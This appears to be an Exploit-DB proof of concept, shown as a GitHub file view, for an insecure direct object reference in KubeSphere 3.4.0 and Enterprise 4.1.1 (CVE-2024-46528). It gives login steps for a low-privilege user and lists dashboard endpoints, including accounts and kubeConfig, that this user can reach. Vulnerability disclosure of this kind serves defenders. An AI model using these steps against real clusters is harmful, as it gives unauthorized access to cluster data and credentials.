15b516383f
4 changes to exploits/shellcodes/ghdb KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR) MoziloCMS 3.0 - Remote Code Execution (RCE) X2CRM 8.5 - Stored Cross-Site Scripting (XSS)
26 lines
No EOL
1.3 KiB
Text
26 lines
No EOL
1.3 KiB
Text
# Exploit Title: IDOR Vulnerability in KubeSphere v3.4.0 & KubeSphere Enterprise v4.1.1
|
|
# Date: 3 September
|
|
# Exploit Author: Okan Kurtulus
|
|
# Vendor Homepage: https://kubesphere.io
|
|
# Software Link: https://github.com/kubesphere/kubesphere
|
|
# Version: [>= 4.0.0 & < 4.1.3] , [>= 3.0.0 & < 3.4.1]
|
|
# Tested on: Ubuntu 22.04
|
|
# CVE : CVE-2024-46528
|
|
|
|
1-) Log in to the system with a user who is not registered to any workspace (e.g., a "platform-regular" user who has limited authorization).
|
|
|
|
Note: The authorization level of this user is as follows:
|
|
"Cannot access any resources before joining a workspace."
|
|
|
|
2-) After logging in with this user, it has been observed that cluster information, node information, users registered in the system, and other similar areas can be accessed without the user being registered to any workspace or cluster.
|
|
|
|
Examples of accessible endpoints:
|
|
|
|
http://xxx.xxx.xx.xx:30880/clusters/default/overview
|
|
http://xxx.xxx.xx.xx:30880/clusters/default/nodes
|
|
http://xxx.xxx.xx.xx:30880/access/accounts
|
|
http://xxx.xxx.xx.xx:30880/clusters/default/monitor-cluster/ranking
|
|
http://xxx.xxx.xx.xx:3 0880/clusters/default/monitor-cluster/resource
|
|
http://xxx.xxx.xx.xx:30880/clusters/default/projects
|
|
http://xxx.xxx.xx.xx:30880/clusters/default/nodes/minikube/pods
|
|
http://xxx.xxx.xx.xx:30880/clusters/default/kubeConfig |